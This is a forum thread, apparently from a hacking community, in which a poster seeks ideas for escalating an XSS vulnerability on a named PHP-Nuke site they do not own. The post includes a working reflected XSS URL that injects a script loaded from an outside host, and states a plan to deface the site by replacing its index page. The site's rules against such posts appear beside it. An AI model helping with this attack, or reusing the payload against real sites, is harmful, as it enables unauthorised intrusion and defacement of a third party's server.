php nuke & XSS - What are the possibilities?
Hey there. I've been working on a site for a little bit. I've established that it is XSS vulnerable & have been able to do a fair bit just through including <script> in the head to a test.js i've created.
I'm stuck however trying to get any further. I've tried heaps of different methods to try and write to index.php or upload a file to the server but all have been unsuccessful.
Wondering if anyone can give me any ideas as to how far I can go with this & or possible methods i could use.
The url which I've been working with, including my script is:
http://kal0nlin3.com/nuke/?pagetitle=kala%3C/title%3E%3C/head%3E%3Cscript+src=http://jiggle.gamesroot.net/test.js? You can see how far i've gotten from the above url~
plain url is just: http://kal0nlin3.com/nuke/
Before posting, please read these rules, to avoid being flammed, or possibly banned from HBH.
Legal rules: **- do not post links to sites you have hacked / intend to hack
- do not ask help for hacking sites you have posted a link to**
- do not post threads asking for people to hack something for you
- do not post any illegal / adult material
Community rules:
- please keep flamming to a minimum unless its completely deserved
- do not post answers or spoliers to the challenges
- frequent spamming on these forums, will result in a ban
- Keep SK in their place. No spoon feeding information.
grow up please. I'm not trying to wipe the guys server out. When i do manage to get in all I wanna do is rename index.php to index.php1 & create a new index.html with the message.
if you had patched your php nuke & secured it, this wouldn't have happened.
I have nothing against the owner.
So anyone got any tips?